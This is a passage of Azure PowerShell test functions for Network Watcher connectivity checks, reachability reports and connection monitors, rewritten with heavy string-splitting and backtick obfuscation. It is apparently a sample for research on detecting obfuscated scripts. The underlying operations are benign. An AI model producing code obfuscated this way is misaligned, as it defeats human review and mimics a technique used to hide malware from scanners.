        &("{0}{2}{1}" -f'Assert','rue','-T') { ${c`HECK}."hO`PS"[0]."t`yPE" -eq "19" -or ${cHe`CK}."h`OPS"[0]."T`YPe" -eq ("{2}{3}{1}{0}"-f 'ine','ach','Virt','ualM')}
        &("{0}{1}{3}{2}" -f'Assert-','Ar','qual','eE') ${CH`Eck}."Ho`PS"[1]."t`Ype" ("{1}{2}{0}"-f'net','I','nter')
        &("{1}{2}{3}{0}" -f 'al','Ass','ert-AreE','qu') ${c`He`CK}."ho`pS"[0]."A`d`drEss" ("{0}{3}{1}{2}" -f'10','17','.3.4','.')
    }
    finally
    {
		&("{2}{5}{4}{3}{1}{0}"-f 'ins','nta','Asse','o','t-ThrowsC','r') { &("{3}{4}{2}{6}{0}{1}{5}"-f 'nne','ct','tche','Test-AzNetworkW','a','ivity','rCo') -NetworkWatcher ${N`W} -SourceId ${VM}."I`d" -DestinationId ${v`M}."I`d" -DestinationPort 80 } ("{2}{0}{1}{8}{4}{10}{3}{11}{12}{7}{6}{5}{9}"-f'n','ne','Co','ck d','tivity',' the same as sour',' be','t','c','ce',' che','estination ','resource id must no');
		&("{0}{3}{2}{1}{4}" -f'As','i','Conta','sert-Throws','ns') { &("{1}{0}{8}{6}{7}{4}{3}{2}{5}"-f't-A','Tes','ti','nnec','rkWatcherCo','vity','N','etwo','z') -NetworkWatcher ${nW} -SourceId ${v`M}."iD" -DestinationPort 80 } ("{7}{14}{10}{1}{12}{2}{3}{5}{18}{15}{16}{9}{0}{8}{6}{17}{11}{4}{13}"-f'n','c','ity ','c','r','he','on ','Con','ati','sti','e','sou','tiv','ce id or address','n',' missi','ng de','re','ck');
		&("{4}{0}{5}{3}{1}{2}" -f'sser','rowsConta','ins','Th','A','t-') { &("{7}{1}{4}{2}{3}{6}{0}{8}{5}"-f'onnect','t-Az','c','her','NetworkWat','ity','C','Tes','iv') -NetworkWatcher ${NW} -SourceId ${vm}."i`D" -DestinationAddress ("{0}{1}" -f'bing.co','m') } ("{1}{4}{0}{5}{2}{3}{6}{7}"-f 't','C',' chec','k mis','onnec','ivity','sing des','tination port');

        
        &("{0}{2}{1}{3}" -f'Clean','ourc','-Res','eGroup') ${RES`OuRCeg`RO`U`PnAME}
        &("{3}{2}{0}{1}"-f'ResourceG','roup','ean-','Cl') ${NWRG`NAme}
    }
}


function TesT`-rEaCH`Ab`iLItYr`epoRT
{
    
    ${R`gnaMe} = &("{6}{2}{4}{5}{3}{1}{0}"-f 'ame','oupN','-','Gr','NrpRes','ource','Get')
    ${n`Wn`AmE} = &("{0}{4}{1}{2}{3}{5}"-f'Get-Nrp','ou','rceNa','m','Res','e')
    ${Re`sOURcETy`pepa`RENt} = ("{5}{7}{6}{4}{1}{0}{3}{2}" -f 'e','rk/n','ers','tworkWatch','two','M','rosoft.Ne','ic')
    ${L`oCAt`ioN} = &("{0}{3}{4}{1}{2}{5}"-f 'Get-','e','rLoca','Pr','ovid','tion') ${r`e`s`O`URcetYPEPaRent} ("{1}{0}{3}{2}{4}" -f't ','Wes','en','C','tral US')
    
    try 
    {
        
        ${REso`Urc`Egro`Up} = &("{3}{2}{1}{0}"-f 'p','eGrou','w-AzResourc','Ne') -Name ${rGna`ME} -Location ${L`ocA`TIon} -Tags @{ ("{1}{0}" -f'esttag','t') = ("{0}{1}"-f 'test','val') }

        
        ${NW} = &("{2}{1}{6}{4}{0}{3}{5}" -f'rkWatc','eateT','Get-Cr','he','two','r','estNe') -location ${LOCAt`Ion} -nwName ${N`wNamE} -nwRgName ${RgnA`ME}

        ${J`Ob} = &("{6}{0}{5}{4}{3}{1}{2}" -f'A','acha','bilityReport','WatcherRe','k','zNetwor','Get-') -NetworkWatcher ${N`W} -Location ("{1}{0}{2}" -f 'est','W',' US') -Country ("{2}{1}{0}"-f 'es','at','United St') -StartTime ("{2}{1}{0}"-f'10-05','7-','201') -EndTime ("{2}{1}{0}"-f '-10-10','017','2') -AsJob
        ${J`oB} | &("{1}{2}{0}" -f 'b','Wait','-Jo')
        ${rE`P`Ort1} = ${j`Ob} | &("{2}{1}{3}{0}" -f'Job','e','R','ceive-')
        ${rE`poR`T2} = &("{4}{11}{7}{0}{9}{3}{6}{1}{2}{5}{10}{8}" -f'rkW','hab','ilit','tche','G','y','rReac','-AzNetwo','ort','a','Rep','et') -NetworkWatcher ${n`w} -Location ("{2}{0}{1}"-f's','t US','We') -Country ("{2}{0}{1}{3}" -f 'ited ','Stat','Un','es') -State ("{2}{0}{1}" -f 'sh','ington','wa') -StartTime ("{2}{0}{1}"-f '-0','5','2017-10') -EndTime ("{1}{0}{3}{2}" -f'0','2017-1','0','-1')
        ${R`epO`Rt3} = &("{1}{5}{2}{0}{3}{7}{8}{6}{4}"-f 'rkWatcher','Ge','wo','Rea','ort','t-AzNet','ep','cha','bilityR') -NetworkWatcher ${N`W} -Location ("{0}{1}"-f 'Wes','t US') -Country ("{0}{3}{1}{2}" -f 'Un','e','s','ited Stat') -State ("{2}{0}{1}" -f 'sh','ington','wa') -City ("{0}{1}" -f 'seattl','e') -StartTime ("{1}{0}{2}" -f '-','2017-10','05') -EndTime ("{2}{1}{0}" -f '17-10-10','0','2')

        &("{3}{2}{4}{0}{1}" -f 'Equa','l','sert-A','As','re') ${r`E`poRt1}."AG`gr`EGatIOn`levEl" ("{1}{0}"-f'ountry','C')
        &("{2}{0}{1}" -f'E','qual','Assert-Are') ${REpOR`T1}."ProvI`der`loC`AtioN"."CoUn`T`RY" ("{2}{1}{0}" -f's','ited State','Un')
        &("{4}{1}{2}{0}{3}"-f'eEqu','ser','t-Ar','al','As') ${R`EpOR`T2}."AggrEGa`Ti`o`NleV`EL" ("{0}{1}"-f'St','ate')
        &("{1}{2}{3}{0}" -f'ual','A','ssert-A','reEq') ${re`p`ORt2}."P`R`oVIDe`RLOc`ATION"."C`o`UNtRY" ("{2}{3}{0}{1}" -f't','es','Unit','ed Sta')
        &("{3}{4}{1}{2}{0}" -f'al','Are','Equ','As','sert-') ${Re`porT2}."pro`V`ide`RL`OCATi`On"."STA`TE" ("{0}{2}{1}"-f 'w','hington','as')
        &("{3}{4}{1}{2}{0}" -f 'qual','t-Are','E','Ass','er') ${R`Ep`ORt3}."Agg`R`EgaTI`oNL`EVeL" ("{0}{1}" -f 'C','ity')
        &("{3}{0}{1}{4}{2}"-f'sert','-','Equal','As','Are') ${REPoR`T3}."providEr`L`o`CaTi`ON"."cO`U`NTry" ("{1}{2}{0}" -f 'es','United',' Stat')
        &("{1}{3}{2}{0}" -f'l','Assert','qua','-AreE') ${ReP`ort3}."pR`O`ViDErLOC`Ation"."StA`Te" ("{0}{1}{2}"-f'washi','ngto','n')
        &("{2}{0}{1}"-f'ert-','AreEqual','Ass') ${R`Epor`T3}."pRoVidE`R`l`OCAtIoN"."c`ItY" ("{1}{0}"-f'ttle','sea')
    }
    finally
    {
        
        &("{3}{5}{4}{2}{0}{1}" -f 'o','up','r','Clea','ResourceG','n-') ${RgN`AmE}
    }
}


function T`ES`T-p`ROVi`DeRslI`st
{
    
    ${r`G`NaMe} = &("{2}{1}{3}{4}{0}{5}{6}"-f'ceGro','t-Nrp','Ge','Resou','r','upN','ame')
    ${nWna`ME} = &("{4}{3}{2}{1}{0}{5}" -f 'c','esour','pR','r','Get-N','eName')
    ${ResoUrcetYp`ePa`R`eNT} = ("{0}{3}{6}{4}{2}{7}{1}{5}"-f'M','tworkWatch','ft.Network/','ic','so','ers','ro','ne')
    ${LO`c`ATIOn} = &("{4}{0}{3}{1}{5}{2}" -f'P','de','ocation','rovi','Get-','rL') ${RES`oUrc`eTyp`EP`A`RenT} ("{3}{0}{2}{1}" -f ' ','entral US','C','West')
    
    try 
    {
        
        ${resou`RCEgR`OuP} = &("{5}{4}{2}{0}{3}{1}"-f'e','p','R','sourceGrou','-Az','New') -Name ${r`gn`AMe} -Location ${l`O`CAt`iON} -Tags @{ ("{1}{0}"-f'esttag','t') = ("{1}{0}"-f 'l','testva') }

        
        ${nW} = &("{4}{5}{2}{3}{0}{1}{6}"-f'tNetwork','Watche','T','es','G','et-Create','r') -location ${lO`C`ATI`ON} -nwName ${NwNA`me} -nwRgName ${rg`Na`mE}

        ${J`Ob} = &("{5}{1}{2}{6}{3}{4}{7}{0}{8}" -f'rovid','etw','orkWatch','rR','eachability','Get-AzN','e','P','ersList') -NetworkWatcher ${nW} -Location ("{1}{0}" -f 'est US','W') -Country ("{2}{1}{0}{3}" -f'd State','ite','Un','s') -AsJob
        ${J`Ob} | &("{2}{0}{1}" -f't-J','ob','Wai')
        ${L`is`T1} = ${j`oB} | &("{2}{1}{0}"-f 'ob','-J','Receive')
        ${L`ISt2} = &("{3}{4}{6}{7}{1}{0}{2}{9}{5}{8}"-f'ha','ac','bility','Get-','AzNetwork','viders','Watcher','Re','List','Pro') -NetworkWatcher ${n`W} -Location ("{1}{0}{2}"-f 'est ','W','US') -Country ("{2}{0}{1}" -f 'nited Sta','tes','U') -State ("{2}{1}{0}" -f'gton','n','washi')
        ${L`I`St3} = &("{0}{6}{5}{2}{3}{1}{4}{7}"-f 'Get','oviders','ch','abilityPr','Lis','erRea','-AzNetworkWatch','t') -NetworkWatcher ${n`W} -Location ("{0}{1}"-f'West U','S') -Country ("{3}{0}{4}{2}{1}"-f 'ed ','ates','t','Unit','S') -State ("{1}{0}{2}"-f 'hingt','was','on') -City ("{2}{0}{1}" -f'eattl','e','s')

        &("{1}{2}{0}" -f'eEqual','Asser','t-Ar') ${LI`sT1}."coun`Tri`ES"."c`ount`RYN`Ame" ("{0}{2}{3}{1}"-f'Unit','s','ed Sta','te')
        &("{0}{2}{3}{1}" -f'As','eEqual','ser','t-Ar') ${l`iST2}."CouN`T`RIes"."C`OUn`TR`YnaME" ("{3}{2}{4}{0}{1}" -f'tate','s','ite','Un','d S')
        &("{1}{2}{0}{3}" -f 'a','Assert-AreEq','u','l') ${L`IST2}."COu`N`Tr`IEs"."St`A`TeS"."s`TA`TeNAme" ("{1}{2}{0}"-f 'n','washing','to')
    }
    finally
    {
        
        &("{3}{1}{0}{2}{4}" -f'-Resourc','lean','eGrou','C','p') ${r`gNa`me}
    }
}


function tEs`T-c`O`NN`E`cTIonmOn`iTOR
{
    
    ${RE`so`U`RcEgrouPnA`me} = &("{4}{0}{5}{3}{6}{1}{2}" -f 'Nrp','oupN','ame','u','Get-','Reso','rceGr')
    ${N`wnA`me} = &("{1}{4}{2}{3}{0}" -f 'ame','Get-N','s','ourceN','rpRe')
    ${L`Oc`At`IoN} = &("{2}{3}{0}{1}{4}"-f'oc','a','Get-P','ilotL','tion')
    ${Re`souR`cEty`PEpa`ReNT} = ("{8}{2}{6}{0}{4}{7}{3}{1}{5}" -f '.Netwo','tcher','icroso','a','rk/network','s','ft','W','M')
    ${NWLO`CAt`IOn} = &("{2}{3}{4}{5}{0}{1}"-f'rLo','cation','Get','-Pr','ovi','de') ${re`sOuRCEt`yP`eparEnT}
    ${NwRGnA`ME} = &("{0}{1}{5}{4}{3}{2}"-f'G','et-NrpResou','e','am','upN','rceGro')
    ${Secu`Ri`TyG`ROu`P`NAmE} = &("{4}{3}{0}{1}{2}"-f'our','c','eName','NrpRes','Get-')
    ${t`e`mPlaTeFi`lE} = (&("{1}{3}{2}{0}" -f 'th','Resol','a','ve-P') ((("{3}{4}{1}{2}{0}{5}" -f'loym','DG','Dep','.c','DGTestDatac','ent.json'))-CREPlace ([chaR]99+[chaR]68+[chaR]71),[chaR]92))."Pa`Th"
    ${c`MN`AME1} = &("{2}{0}{1}{3}"-f'-N','rpResourceNam','Get','e')
    ${cm`NA`mE2} = &("{2}{0}{5}{4}{3}{1}" -f '-Nr','eName','Get','rc','ou','pRes')
    
    ${L`oCaTIo`N`MOD} = (${Lo`caT`iOn} -replace " ","").("{2}{0}{1}" -f'Lo','wer','To').Invoke()

    try 
    {
        . ((("{4}{6}{5}{2}{1}{0}{3}" -f 'p','.','rces','s1','.{0}Az','Resou','ureRM.'))  -f [CHar]92)

        
        &("{1}{4}{3}{2}{0}"-f 'oup','New-AzRes','eGr','urc','o') -Name ${ReSo`UrCEGr`oU`pN`AmE} -Location "$location"

        
        &("{1}{0}{5}{4}{2}{3}"-f'-','Get','rcesDeploymen','t','esou','TestR') -rgn "$resourceGroupName"

        
        &("{3}{0}{1}{2}{4}"-f '-AzRe','sourc','eGr','New','oup') -Name ${N`WRGNaMe} -Location "$location"
        
        
        ${N`W} = &("{5}{3}{2}{0}{4}{1}"-f 'stNet','tcher','eateTe','t-Cr','workWa','Ge') -location ${l`oCat`Ion} -nwName ${nWNA`me} -nwRgName ${nW`Rg`NAME}

        
        ${vM} = &("{1}{2}{0}"-f 'zVM','G','et-A') -ResourceGroupName ${RE`Sour`C`Egr`OuP`Name}
        
        
        &("{3}{4}{2}{1}{0}" -f 'on','nsi','AzVMExte','Set','-') -ResourceGroupName "$resourceGroupName" -Location "$location" -VMName ${V`M}."Na`Me" -Name ("{4}{1}{2}{5}{6}{0}{3}" -f 'orkWa','y','N','tcherAgent','M','et','w') -Type ("{2}{1}{5}{0}{3}{4}"-f'Wat','e','N','cherAgentWin','dows','twork') -TypeHandlerVersion "1.4" -Publisher ("{2}{5}{4}{3}{0}{1}" -f 'c','her','Microsoft.Azu','orkWat','.Netw','re')?

        
        ${Jo`B1} = &("{3}{1}{5}{6}{4}{2}{0}{7}" -f 'M','NetworkWa','n','New-Az','erConnectio','t','ch','onitor') -NetworkWatcher ${n`w} -Name ${c`MNA`mE1} -SourceResourceId ${Vm}."I`d" -DestinationAddress ("{2}{1}{0}"-f'om','c','bing.') -DestinationPort 80 -AsJob
        ${Jo`B1} | &("{2}{0}{1}"-f't-','Job','Wai')
        ${c`M1} = ${JO`B1} | &("{2}{0}{1}" -f'J','ob','Receive-')

        
        &("{0}{2}{1}{3}"-f'Assert-Are','u','Eq','al') ${c`m1}."n`AMe" ${Cmn`Am`e1}
        &("{1}{2}{3}{0}" -f 'l','Assert-','A','reEqua') ${c`M1}."sO`URcE"."r`ES`OURCeId" ${v`M}."i`D"
        &("{4}{2}{3}{1}{0}"-f 'al','qu','sser','t-AreE','A') ${C`m1}."DESt`iN`ATi`ON"."aD`dRE`SS" ("{1}{0}" -f 'om','bing.c')
        &("{2}{1}{3}{4}{0}" -f'ual','ert-','Ass','A','reEq') ${C`m1}."d`est`i`NATioN"."po`Rt" 80

        ${j`OB2} = &("{4}{5}{6}{2}{1}{0}{3}" -f'necti','n','herCo','onMonitor','New-Az','Ne','tworkWatc') -NetworkWatcher ${nw} -Name ${C`m`NaME2} -SourceResourceId ${v`M}."Id" -DestinationAddress ("{0}{2}{1}" -f 'goog','m','le.co') -DestinationPort 80 -AsJob
        ${Jo`B2} | &("{0}{1}{2}" -f 'Wa','it','-Job')
        ${c`M2} = ${jO`B2} | &("{0}{2}{1}" -f'Re','-Job','ceive')

        
        &("{1}{2}{0}"-f'qual','Assert-','AreE') ${C`M2}."Na`me" ${cmNA`M`e2}
        &("{2}{1}{0}"-f'l','Equa','Assert-Are') ${c`m2}."s`Ou`Rce"."r`Eso`Ur`cEid" ${Vm}."I`D"
        &("{1}{3}{0}{2}"-f'Equ','As','al','sert-Are') ${C`M2}."DESt`I`N`ATion"."AdD`R`Ess" ("{0}{1}{2}{3}"-f'go','ogl','e.c','om')
        &("{3}{4}{0}{2}{1}"-f'ert-AreEq','l','ua','A','ss') ${C`m2}."DES`T`INaTI`On"."PO`RT" 80
        &("{3}{1}{2}{0}"-f 'al','ert-Are','Equ','Ass') ${c`M2}."mON`iTorinGStA`TUs" ("{1}{2}{0}"-f'g','R','unnin')

        

        &("{11}{7}{2}{5}{10}{0}{1}{9}{6}{3}{8}{4}" -f 'twor','kWatc','p','io','onitor','-','nect','to','nM','herCon','AzNe','S') -ResourceGroup ${n`W}."rEso`UrC`eGroup`N`AME" -NetworkWatcherName ${nw}."N`Ame" -Name ${CM`N`AmE1}
        ${c`m1} = &("{2}{5}{0}{4}{6}{7}{3}{1}" -f 'z','or','Set','nit','N','-A','etworkW','atcherConnectionMo') -ResourceGroup ${n`w}."r`EsoU`RCe`grOu`pn`Ame" -NetworkWatcherName ${nw}."n`Ame" -Name ${Cm`NAMe1} -SourceResourceId ${v`M}."iD" -DestinationAddress ("{2}{0}{1}"-f'o','m','bing.c') -DestinationPort 81 -ConfigureOnly -MonitoringIntervalInSeconds 50
        &("{2}{3}{0}{1}"-f 'A','reEqual','Assert','-') ${C`m1}."DE`sTI`NAtIon"."Po`RT" 81
        &("{0}{1}{4}{2}{3}"-f'Ass','ert','eEqua','l','-Ar') ${c`m1}."Mon`it`Orin`giNTeR`VAlI`NsEC`OnDS" 50

        &("{10}{6}{4}{0}{7}{5}{9}{8}{3}{1}{11}{2}" -f '-AzNetw','Connectio','Monitor','her','op','rkWa','t','o','c','t','S','n') -ResourceGroup ${Nw}."rEsOUrC`eG`RoUP`NAME" -NetworkWatcherName ${NW}."n`AME" -Name ${c`mN`AME1}
        ${c`m1} = &("{6}{1}{8}{0}{2}{3}{7}{4}{5}" -f't','t-Az','che','rConnection','onit','or','Se','M','NetworkWa') -Location ${LOc`ATION`MoD} -Name ${c`M`NamE1} -SourceResourceId ${Vm}."I`D" -DestinationAddress ("{1}{0}"-f 'om','test.c') -DestinationPort 81 -MonitoringIntervalInSeconds 50
        &("{2}{3}{1}{0}" -f 'l','-AreEqua','A','ssert') ${C`m1}."Des`T`I`NAtiON"."a`DDrE`sS" ("{0}{1}{2}" -f'test','.co','m')

        &("{3}{2}{5}{7}{4}{1}{0}{6}" -f 'Mo','ction','p','Sto','rConne','-','nitor','AzNetworkWatche') -ResourceGroup ${n`w}."REsOUR`cE`GR`Oup`NAme" -NetworkWatcherName ${N`w}."nA`ME" -Name ${c`MnaMe1}
        ${c`m1} = &("{6}{3}{2}{4}{0}{1}{5}"-f 'Co','nnect','rkWatche','Netwo','r','ionMonitor','Set-Az') -ResourceId ${c`M1}."id" -SourceResourceId ${VM}."I`D" -DestinationAddress ("{0}{2}{1}"-f't','m','est.co') -DestinationPort 80 -MonitoringIntervalInSeconds 50
        &("{1}{3}{0}{4}{2}"-f'AreE','Asser','al','t-','qu') ${c`M1}."dESTi`Na`TIoN"."p`ort" 80

        &("{3}{0}{4}{5}{6}{1}{2}{7}{10}{9}{8}" -f'op-','r','kW','St','AzNet','w','o','atcherConnecti','nitor','Mo','on') -ResourceGroup ${nw}."Re`soURCeg`RO`Up`NAme" -NetworkWatcherName ${N`W}."Na`Me" -Name ${c`mn`AMe1}
        ${cm`1`JOB} = &("{6}{7}{2}{1}{5}{3}{0}{4}" -f'ectionMoni','rkWatcher','o','onn','tor','C','Set-AzNe','tw') -InputObject ${c`m1} -SourceResourceId ${V`m}."Id" -DestinationAddress ("{2}{1}{0}" -f'com','t.','tes') -DestinationPort 81 -MonitoringIntervalInSeconds 42 -AsJob
        ${C`m1JoB} | &("{2}{1}{0}"-f'-Job','ait','W')
        ${c`m1} = ${cM1`j`oB} | &("{2}{1}{3}{0}"-f'-Job','e','R','ceive')
        &("{4}{2}{1}{3}{0}"-f 'ual','-','sert','AreEq','As') ${C`m1}."monIt`OrIn`g`iN`TervAlI`Nseco`N`dS" 42

        &("{3}{2}{1}{4}{6}{5}{7}{0}{8}"-f'i','tworkWatch','p-AzNe','Sto','e','nectio','rCon','nMon','tor') -ResourceGroup ${Nw}."rEsour`C`EG`RoUPName" -NetworkWatcherName ${n`w}."N`AME" -Name ${C`M`NAMe1}
        ${c`M1} = &("{1}{5}{9}{2}{4}{3}{8}{6}{0}{7}" -f 'nit','Set-Az','WatcherC','c','onne','Networ','ionMo','or','t','k') -NetworkWatcher ${nw} -Name ${CmNA`me1} -SourceResourceId ${V`m}."Id" -DestinationAddress ("{0}{2}{1}" -f'te','om','st.c') -DestinationPort 80 -MonitoringIntervalInSeconds 42
        &("{3}{4}{0}{1}{2}"-f'r','e','Equal','Asser','t-A') ${C`m1}."des`T`INAt`ioN"."PO`Rt" 80

        
        ${StOpj`Ob} = &("{6}{4}{7}{10}{11}{0}{1}{3}{2}{9}{5}{8}" -f 'he','r','c','Conne','top-AzN','nMon','S','etwork','itor','tio','Wat','c') -NetworkWatcher ${nw} -Name ${C`Mna`Me2} -AsJob -PassThru
        ${sT`OpjOb} | &("{0}{2}{1}" -f'W','ob','ait-J')
        ${Sto`p`RES`ULt} = ${st`opj`oB} | &("{1}{0}{2}" -f 've-','Recei','Job')
        &("{1}{2}{0}" -f'Equal','Ass','ert-Are') ("{1}{0}" -f 'ue','tr') ${s`ToPrE`S`UlT}
        ${C`M2} = &("{4}{5}{1}{0}{6}{3}{2}" -f'c','NetworkWatcherConne','nMonitor','io','G','et-Az','t') -NetworkWatcher ${n`W} -Name ${Cmn`AM`e2}
        &("{2}{1}{0}{3}{4}"-f 'reE','sert-A','As','qu','al') ${c`M2}."MoNito`RI`NGsT`ATuS" ("{1}{0}"-f 'opped','St')

        
        ${STA`R`Tjob} = &("{11}{1}{6}{5}{7}{0}{2}{9}{4}{10}{3}{8}"-f'o','rt-A','rkWatch','Moni','onnect','Net','z','w','tor','erC','ion','Sta') -NetworkWatcher ${nW} -Name ${c`mN`AME2} -AsJob -PassThru
        ${sTAR`TJ`Ob} | &("{0}{2}{1}" -f'W','Job','ait-')
        ${S`Tar`Tresult} = ${St`Ar`Tjob} | &("{0}{3}{1}{2}"-f 'Re','iv','e-Job','ce')
        &("{3}{0}{4}{1}{2}" -f'rt','qu','al','Asse','-AreE') ("{1}{0}"-f 'rue','t') ${s`T`AR`TResuLT}
        ${c`m2} = &("{2}{5}{0}{1}{7}{4}{3}{6}"-f'et','wo','Get-Az','Monit','nection','N','or','rkWatcherCon') -NetworkWatcher ${n`W} -Name ${cMNa`M`E2}
        &("{2}{1}{3}{0}"-f 'reEqual','sert-','As','A') ${c`m2}."M`ONiT`oR`IngS`TAT`Us" ("{1}{0}" -f 'ning','Run')

        
        &("{5}{3}{7}{1}{0}{6}{4}{2}{8}" -f 'cherConne','workWat','nit','z','o','Stop-A','ctionM','Net','or') -Location ${lOcA`TION`mOD} -Name ${c`M2}."nA`me"
        ${c`M2} = &("{11}{2}{7}{3}{9}{6}{1}{8}{0}{4}{5}{10}" -f'Mo','ecti','AzNetwork','atc','nit','o','nn','W','on','herCo','r','Get-') -Location ${LO`CAt`iO`NMOd} -Name ${C`M2}."nA`mE"
        &("{1}{2}{3}{0}"-f '-AreEqual','As','se','rt') ${C`M2}."mo`NiTo`Ri`NgStAT`Us" ("{0}{1}"-f'Stoppe','d')
        
        
        &("{4}{2}{0}{6}{5}{1}{3}{7}" -f 'kWa','ctionMo','t-AzNetwor','nito','Star','ne','tcherCon','r') -Location ${LoCAt`I`OnMoD} -Name ${C`m2}."nA`me"
        ${C`M2} = &("{2}{7}{5}{3}{4}{6}{9}{1}{8}{0}" -f'or','onMon','Get-A','cher','Con','tworkWat','nect','zNe','it','i') -Location ${locAtI`onM`od} -Name ${c`m2}."NA`mE"
        &("{1}{0}{2}" -f'rt-AreE','Asse','qual') ${C`m2}."mOnIt`orI`NGs`TaT`US" ("{0}{1}" -f'Runnin','g')

        
        &("{1}{7}{4}{5}{2}{3}{9}{0}{6}{8}"-f'e','St','kWatche','rCo','zNe','twor','ctionMonito','op-A','r','nn') -ResourceId ${c`m2}."I`d"
        ${C`M2} = &("{3}{0}{1}{4}{5}{6}{2}"-f 'Az','NetworkW','itor','Get-','a','tcherConnectio','nMon') -ResourceId ${C`m2}."i`D"
        &("{1}{3}{0}{2}{4}" -f 'r','Asser','eE','t-A','qual') ${C`m2}."MON`IT`ORINGs`TatUS" ("{1}{0}" -f 'ed','Stopp')

        
        &("{1}{4}{0}{3}{2}{6}{5}"-f 'h','Start-AzNetwork','rConnecti','e','Watc','onitor','onM') -ResourceId ${c`m2}."iD"
        ${C`m2} = &("{11}{5}{10}{3}{0}{8}{9}{2}{1}{6}{4}{7}"-f'or','rConnection','e','w','o','et-AzN','M','nitor','k','Watch','et','G') -ResourceId ${C`M2}."id"
        &("{4}{2}{0}{3}{1}"-f'e','al','s','rt-AreEqu','As') ${C`m2}."m`onI`T`OrIN`gStaTUs" ("{2}{0}{1}" -f'n','ing','Run')

        
        &("{7}{9}{8}{2}{1}{5}{3}{6}{10}{4}{0}{11}"-f 'it','W','rk','rConn','on','atche','ectio','S','o','top-AzNetw','nM','or') -InputObject ${c`M2}
        ${C`M2} = &("{4}{8}{6}{5}{3}{2}{9}{1}{7}{0}"-f'nitor','ti','her','kWatc','G','r','wo','onMo','et-AzNet','Connec') -NetworkWatcher ${nw} -Name ${cM`NAM`E2}
        &("{1}{3}{0}{2}{4}"-f 'rt','Ass','-AreEq','e','ual') ${C`m2}."moN`ITO`RinG`s`TatuS" ("{0}{1}" -f 'Sto','pped')

        
        &("{4}{1}{8}{6}{10}{7}{2}{0}{3}{9}{5}"-f'her','rt-AzN','c','Con','Sta','Monitor','wor','Wat','et','nection','k') -InputObject ${C`M2}
        ${C`M2} = &("{1}{8}{6}{3}{4}{0}{5}{2}{7}{9}" -f't','Get-AzN','i','ne','c','ionMon','erCon','t','etworkWatch','or') -NetworkWatcher ${n`w} -Name ${c`mn`AmE2}
        &("{1}{0}{2}" -f 'ert-Are','Ass','Equal') ${C`M2}."moNITO`Ri`NG`s`Ta`TUs" ("{1}{0}" -f 'ng','Runni')

        
        ${C`mS} = &("{2}{4}{0}{5}{1}{3}{6}"-f 'z','rConnec','G','tionMoni','et-A','NetworkWatche','tor') -NetworkWatcher ${Nw} -Name "*"
        &("{2}{4}{0}{3}{1}" -f 'ot','ll','Asse','Nu','rt-N') ${C`MS}

        
        ${RE`POrT} = &("{4}{5}{11}{2}{1}{0}{9}{3}{7}{10}{6}{8}" -f'tcherCon','a','workW','cti','Get-AzN','e','or','onM','Report','ne','onit','t') -NetworkWatcher ${nw} -Name ${c`MnAmE1}
        &("{0}{2}{3}{1}"-f 'Ass','Null','ert-No','t') ${rEPo`Rt}

        ${Re`POrT} = &("{3}{1}{2}{5}{7}{4}{0}{6}" -f'rRep','-AzNetworkWatche','rConnec','Get','to','t','ort','ionMoni') -Location ${LOCa`TiOnM`od} -Name ${c`Mna`ME1}
        &("{3}{2}{4}{0}{1}"-f't','Null','N','Assert-','o') ${REp`o`RT}

        ${R`e`poRT} = &("{6}{0}{9}{7}{8}{3}{10}{4}{2}{5}{1}" -f'e','Report','atcherConnectionMoni','Netw','W','tor','G','-A','z','t','ork') -ResourceId ${c`m1}."i`d"
        &("{2}{0}{3}{1}" -f'e','NotNull','Ass','rt-') ${R`EpO`Rt}

        ${REPO`Rt`jOb} = &("{6}{1}{5}{4}{0}{3}{2}" -f 'necti','Watc','rt','onMonitorRepo','on','herC','Get-AzNetwork') -InputObject ${c`m1} -AsJob
        ${rep`o`RtjOb} | &("{2}{0}{1}"-f 'ai','t-Job','W')
        ${r`epo`Rt} = ${r`epOr`TjoB} | &("{2}{1}{0}"-f 'eive-Job','c','Re')
        &("{2}{0}{1}" -f'ert-','NotNull','Ass') ${r`ep`ORT}

        
        &("{8}{7}{5}{4}{0}{2}{6}{1}{3}" -f 'nnecti','o','o','r','o','-AzNetworkWatcherC','nMonit','move','Re') -NetworkWatcher ${N`w} -Name ${Cm`N`Ame1}
        &("{1}{0}"-f 'Vm','Wait-') ${vm}

        
        ${j`OB1} = &("{8}{7}{2}{4}{0}{9}{3}{5}{1}{6}" -f'he','t','N','ConnectionMo','etworkWatc','ni','or','ew-Az','N','r') -Location ${l`OcAT`iO`NmOd} -Name ${cmn`AmE1} -SourceResourceId ${v`M}."id" -DestinationAddress ("{0}{2}{1}"-f'bing','m','.co') -DestinationPort 80 -ConfigureOnly -MonitoringIntervalInSeconds 30 -AsJob
        ${j`Ob1} | &("{1}{0}{2}"-f'i','Wa','t-Job')
        ${C`m1} = ${J`oB1} | &("{2}{1}{0}" -f'ob','e-J','Receiv')

        &("{10}{5}{8}{9}{2}{1}{3}{4}{7}{0}{11}{6}{12}" -f 'nnecti','Wat','twork','ch','e','move','to','rCo','-','AzNe','Re','onMoni','r') -Location ${Lo`C`AtIOnMod} -Name ${Cm`Na`Me1}
        &("{2}{1}{0}" -f 't-Vm','ai','W') ${v`M}

        
        ${j`oB1} = &("{4}{0}{2}{5}{1}{7}{6}{8}{3}"-f'ew-','er','A','or','N','zNetworkWatch','Mon','Connection','it') -ResourceGroup ${nW}."reSoURc`eG`ROU`p`NA`Me" -NetworkWatcherName ${nw}."nA`mE" -Name ${C`mN`AMe1} -SourceResourceId ${VM}."I`D" -DestinationAddress ("{0}{2}{1}"-f 'b','g.com','in') -DestinationPort 80 -ConfigureOnly -MonitoringIntervalInSeconds 30 -AsJob
        ${jo`B1} | &("{0}{1}{2}"-f'W','ait','-Job')
        ${C`m1} = ${j`oB1} | &("{0}{1}{2}"-f 'Receiv','e','-Job')

        &("{8}{4}{5}{0}{3}{2}{7}{6}{1}"-f'AzNetwo','onMonitor','Watc','rk','em','ove-','rConnecti','he','R') -ResourceId ${C`M1}."iD"
        &("{0}{2}{1}"-f 'Wa','-Vm','it') ${vM}

        
        ${jO`B1} = &("{2}{7}{6}{4}{8}{9}{0}{1}{5}{3}"-f'erConnectionMon','it','Ne','r','work','o','AzNet','w-','Wat','ch') -ResourceGroup ${Nw}."rESourC`E`G`R`OuPn`AMe" -NetworkWatcherName ${n`W}."N`Ame" -Name ${cMN`A`me1} -SourceResourceId ${VM}."Id" -DestinationAddress ("{2}{0}{1}" -f 'ing.c','om','b') -DestinationPort 80 -ConfigureOnly -MonitoringIntervalInSeconds 30 -AsJob
        ${Jo`B1} | &("{0}{1}"-f 'Wai','t-Job')
        ${c`M1} = ${J`Ob1} | &("{1}{2}{3}{0}"-f'ob','Receiv','e','-J')

